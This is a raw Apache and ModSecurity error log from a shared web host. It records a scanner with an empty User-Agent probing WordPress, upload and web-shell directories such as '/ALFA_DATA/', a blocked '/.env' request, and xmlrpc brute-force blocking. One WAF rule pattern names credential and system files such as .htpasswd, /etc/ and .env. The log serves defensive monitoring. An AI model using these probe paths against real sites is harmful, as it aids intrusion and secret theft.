[Tue May 26 16:41:16.872927 2026] [security2:error] [pid 823496:tid 823670] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_1Ja08mrtyBNpA4PBfQAAACo"]
[Tue May 26 16:41:16.873544 2026] [security2:error] [pid 823496:tid 823681] [client 89.117.104.6:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/wp-content/mu-plugins/"] [unique_id "ahV_1Ja08mrtyBNpA4PBewAAADU"]
[Tue May 26 16:41:17.094024 2026] [autoindex:error] [pid 823496:tid 823644] [client 89.117.104.6:0] AH01276: Cannot serve directory /home2/srsglzts/public_html/wp-includes/Text/Diff/Renderer/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:41:17.094707 2026] [security2:error] [pid 823496:tid 823644] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/cgi-sys/403.html"] [unique_id "ahV_1Za08mrtyBNpA4PBgwAAABA"]
[Tue May 26 16:41:17.095032 2026] [security2:error] [pid 823496:tid 823689] [client 89.117.104.6:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/wp-includes/Text/Diff/Renderer/"] [unique_id "ahV_1Za08mrtyBNpA4PBggAAAD0"]
[Tue May 26 16:41:17.304946 2026] [security2:error] [pid 823496:tid 823713] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.srsglobalsoft.com"] [uri "/wp-includes/blocks/index.php"] [unique_id "ahV_1Za08mrtyBNpA4PBigAAAFU"]
[Tue May 26 16:41:17.305254 2026] [security2:error] [pid 823496:tid 823704] [client 89.117.104.6:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.srsglobalsoft.com"] [uri "/wp-includes/blocks/"] [unique_id "ahV_1Za08mrtyBNpA4PBiAAAAEw"]
[Tue May 26 16:41:17.308609 2026] [security2:error] [pid 823496:tid 823668] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_0Za08mrtyBNpA4PBOgAAACg"]
[Tue May 26 16:41:17.505341 2026] [autoindex:error] [pid 817651:tid 817863] [client 89.117.104.6:0] AH01276: Cannot serve directory /home2/srsglzts/public_html/wp-includes/certificates/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:41:17.505970 2026] [security2:error] [pid 817651:tid 817863] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/cgi-sys/403.html"] [unique_id "ahV_1dlGRCPPN1dS2y2pcQAAANc"]
[Tue May 26 16:41:17.517026 2026] [security2:error] [pid 823496:tid 823693] [client 89.117.104.6:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/wp-includes/certificates/"] [unique_id "ahV_1Za08mrtyBNpA4PBjwAAAEE"]
[Tue May 26 16:41:17.695210 2026] [autoindex:error] [pid 817651:tid 817875] [client 89.117.104.6:0] AH01276: Cannot serve directory /home2/srsglzts/public_html/wp-includes/customize/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:41:17.695986 2026] [security2:error] [pid 817651:tid 817875] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/cgi-sys/403.html"] [unique_id "ahV_1dlGRCPPN1dS2y2pdwAAAOM"]
[Tue May 26 16:41:17.696201 2026] [security2:error] [pid 823496:tid 823719] [client 89.117.104.6:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/wp-includes/customize/"] [unique_id "ahV_1Za08mrtyBNpA4PBlAAAAFs"]
[Tue May 26 16:41:17.909428 2026] [autoindex:error] [pid 823496:tid 823732] [client 89.117.104.6:0] AH01276: Cannot serve directory /home2/srsglzts/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:41:17.910127 2026] [security2:error] [pid 823496:tid 823732] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/cgi-sys/403.html"] [unique_id "ahV_1Za08mrtyBNpA4PBmwAAAGg"]
[Tue May 26 16:41:17.912875 2026] [security2:error] [pid 823496:tid 823728] [client 89.117.104.6:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/wp-includes/fonts/"] [unique_id "ahV_1Za08mrtyBNpA4PBmQAAAGQ"]
[Tue May 26 16:41:18.105482 2026] [autoindex:error] [pid 817651:tid 817889] [client 89.117.104.6:0] AH01276: Cannot serve directory /home2/srsglzts/public_html/wp-includes/images/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:41:18.106154 2026] [security2:error] [pid 817651:tid 817889] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/cgi-sys/403.html"] [unique_id "ahV_1tlGRCPPN1dS2y2pfgAAAPE"]
[Tue May 26 16:41:18.106618 2026] [security2:error] [pid 823496:tid 823748] [client 89.117.104.6:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/wp-includes/images/"] [unique_id "ahV_1pa08mrtyBNpA4PBnwAAAHg"]
[Tue May 26 16:41:18.311087 2026] [autoindex:error] [pid 823496:tid 823655] [client 89.117.104.6:0] AH01276: Cannot serve directory /home2/srsglzts/public_html/.well-known/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:41:18.311785 2026] [security2:error] [pid 823496:tid 823655] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/cgi-sys/403.html"] [unique_id "ahV_1pa08mrtyBNpA4PBqwAAABs"]
[Tue May 26 16:41:18.312219 2026] [security2:error] [pid 823496:tid 823633] [client 89.117.104.6:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/.well-known/"] [unique_id "ahV_1pa08mrtyBNpA4PBqQAAAAU"]
[Tue May 26 16:41:18.564978 2026] [security2:error] [pid 817651:tid 817835] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_1tlGRCPPN1dS2y2pgQAAALs"]
[Tue May 26 16:41:18.565007 2026] [security2:error] [pid 817651:tid 817835] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_1tlGRCPPN1dS2y2pgQAAALs"]
[Tue May 26 16:41:18.574046 2026] [security2:error] [pid 823496:tid 823653] [client 89.117.104.6:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/ALFA_DATA/"] [unique_id "ahV_1pa08mrtyBNpA4PBrwAAABk"]
[Tue May 26 16:41:18.854262 2026] [security2:error] [pid 817651:tid 817864] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_1tlGRCPPN1dS2y2pggAAANg"]
[Tue May 26 16:41:18.854293 2026] [security2:error] [pid 817651:tid 817864] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_1tlGRCPPN1dS2y2pggAAANg"]
[Tue May 26 16:41:18.855612 2026] [security2:error] [pid 823496:tid 823672] [client 89.117.104.6:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/.well-knownold/"] [unique_id "ahV_1pa08mrtyBNpA4PBsQAAACw"]
[Tue May 26 16:41:19.051337 2026] [security2:error] [pid 817651:tid 817833] [client 130.254.112.103:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV_1tlGRCPPN1dS2y2piAAAALk"], referer: https://www.anujtradingco.com/
[Tue May 26 16:41:19.055032 2026] [security2:error] [pid 823496:tid 823639] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_05a08mrtyBNpA4PBbgAAAAs"]
[Tue May 26 16:41:19.066317 2026] [security2:error] [pid 817651:tid 817830] [client 195.178.110.34:35254] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.digentasmartsn.com"] [uri "/___proxy_subdomain_cpanel/new/.env"] [unique_id "ahV_19lGRCPPN1dS2y2piQAAALY"]
[Tue May 26 16:41:19.105957 2026] [autoindex:error] [pid 823496:tid 823677] [client 89.117.104.6:0] AH01276: Cannot serve directory /home2/srsglzts/public_html/.well-known/acme-challenge/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:41:19.106651 2026] [security2:error] [pid 823496:tid 823677] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/cgi-sys/403.html"] [unique_id "ahV_15a08mrtyBNpA4PBvwAAADE"]
[Tue May 26 16:41:19.107074 2026] [security2:error] [pid 823496:tid 823683] [client 89.117.104.6:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/.well-known/acme-challenge/"] [unique_id "ahV_15a08mrtyBNpA4PBvQAAADc"]
[Tue May 26 16:41:19.297935 2026] [cgid:error] [pid 823496:tid 823670] [client 89.117.104.6:0] AH01265: stderr from /home2/srsglzts/public_html/cgi-bin/: attempt to invoke directory as script
[Tue May 26 16:41:19.298588 2026] [security2:error] [pid 823496:tid 823670] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/cgi-sys/403.html"] [unique_id "ahV_15a08mrtyBNpA4PBxAAAACo"]
[Tue May 26 16:41:19.298981 2026] [security2:error] [pid 823496:tid 823669] [client 89.117.104.6:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/cgi-bin/"] [unique_id "ahV_15a08mrtyBNpA4PBwQAAACk"]
[Tue May 26 16:41:19.533290 2026] [security2:error] [pid 823496:tid 823668] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_15a08mrtyBNpA4PBzAAAACg"]
[Tue May 26 16:41:19.533317 2026] [security2:error] [pid 823496:tid 823668] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_15a08mrtyBNpA4PBzAAAACg"]
[Tue May 26 16:41:19.534867 2026] [security2:error] [pid 823496:tid 823714] [client 89.117.104.6:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index/"] [unique_id "ahV_15a08mrtyBNpA4PBygAAAFY"]
[Tue May 26 16:41:19.827605 2026] [security2:error] [pid 823496:tid 823720] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_15a08mrtyBNpA4PB0wAAAFw"]
[Tue May 26 16:41:19.827650 2026] [security2:error] [pid 823496:tid 823720] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_15a08mrtyBNpA4PB0wAAAFw"]
[Tue May 26 16:41:19.828063 2026] [security2:error] [pid 823496:tid 823696] [client 89.117.104.6:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/id/"] [unique_id "ahV_15a08mrtyBNpA4PB0QAAAEQ"]
[Tue May 26 16:41:20.053461 2026] [security2:error] [pid 823496:tid 823711] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_1Za08mrtyBNpA4PBjAAAAFM"]
[Tue May 26 16:41:20.067150 2026] [security2:error] [pid 823496:tid 823728] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_2Ja08mrtyBNpA4PB2wAAAGQ"]
[Tue May 26 16:41:20.067182 2026] [security2:error] [pid 823496:tid 823728] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_2Ja08mrtyBNpA4PB2wAAAGQ"]
[Tue May 26 16:41:20.067658 2026] [security2:error] [pid 823496:tid 823725] [client 89.117.104.6:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/www/"] [unique_id "ahV_2Ja08mrtyBNpA4PB2QAAAGE"]
[Tue May 26 16:41:20.282282 2026] [security2:error] [pid 823496:tid 823746] [client 130.254.112.103:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV_2Ja08mrtyBNpA4PB4gAAAHY"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1244863&moderation-hash=fb73036127ca56ad8acb33d37e05bf46
[Tue May 26 16:41:20.328205 2026] [security2:error] [pid 823496:tid 823740] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_2Ja08mrtyBNpA4PB5QAAAHA"]
[Tue May 26 16:41:20.328225 2026] [security2:error] [pid 823496:tid 823740] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_2Ja08mrtyBNpA4PB5QAAAHA"]
[Tue May 26 16:41:20.328973 2026] [security2:error] [pid 823496:tid 823747] [client 89.117.104.6:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/web/"] [unique_id "ahV_2Ja08mrtyBNpA4PB4wAAAHc"]
[Tue May 26 16:41:20.488192 2026] [security2:error] [pid 823496:tid 823724] [client 117.198.37.168:53060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_2Ja08mrtyBNpA4PB6QAAAGA"]
[Tue May 26 16:41:20.488309 2026] [security2:error] [pid 823496:tid 823724] [client 117.198.37.168:53060] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_2Ja08mrtyBNpA4PB6QAAAGA"]
[Tue May 26 16:41:20.557250 2026] [security2:error] [pid 823496:tid 823633] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_2Ja08mrtyBNpA4PB7AAAAAU"]
[Tue May 26 16:41:20.557285 2026] [security2:error] [pid 823496:tid 823633] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_2Ja08mrtyBNpA4PB7AAAAAU"]
[Tue May 26 16:41:20.557773 2026] [security2:error] [pid 823496:tid 823753] [client 89.117.104.6:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/uploads/"] [unique_id "ahV_2Ja08mrtyBNpA4PB6gAAAH0"]
[Tue May 26 16:41:20.825512 2026] [security2:error] [pid 823496:tid 823640] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_2Ja08mrtyBNpA4PB8gAAAAw"]
[Tue May 26 16:41:20.825537 2026] [security2:error] [pid 823496:tid 823640] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_2Ja08mrtyBNpA4PB8gAAAAw"]
[Tue May 26 16:41:20.826136 2026] [security2:error] [pid 823496:tid 823739] [client 89.117.104.6:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/upload/"] [unique_id "ahV_2Ja08mrtyBNpA4PB8AAAAG8"]
[Tue May 26 16:41:21.135849 2026] [security2:error] [pid 823496:tid 823637] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_2Za08mrtyBNpA4PB-AAAAAk"]
[Tue May 26 16:41:21.135876 2026] [security2:error] [pid 823496:tid 823637] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_2Za08mrtyBNpA4PB-AAAAAk"]
[Tue May 26 16:41:21.136364 2026] [security2:error] [pid 823496:tid 823649] [client 89.117.104.6:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/admin/uploads/"] [unique_id "ahV_2Za08mrtyBNpA4PB9gAAABU"]
[Tue May 26 16:41:21.370961 2026] [security2:error] [pid 817651:tid 817894] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_2dlGRCPPN1dS2y2pmQAAAPY"]
[Tue May 26 16:41:21.370989 2026] [security2:error] [pid 817651:tid 817894] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_2dlGRCPPN1dS2y2pmQAAAPY"]
[Tue May 26 16:41:21.371647 2026] [security2:error] [pid 823496:tid 823707] [client 89.117.104.6:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/Admin/uploads/"] [unique_id "ahV_2Za08mrtyBNpA4PB_gAAAE8"]
[Tue May 26 16:41:21.627290 2026] [security2:error] [pid 823496:tid 823519] [remote 114.119.152.161:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.stockmarketanalysis.in"] [uri "/stock-cash-tips.php"] [unique_id "ahV_2Za08mrtyBNpA4PCBAAASBQ"], referer: https://www.stockmarketanalysis.in/bullion-tips.php
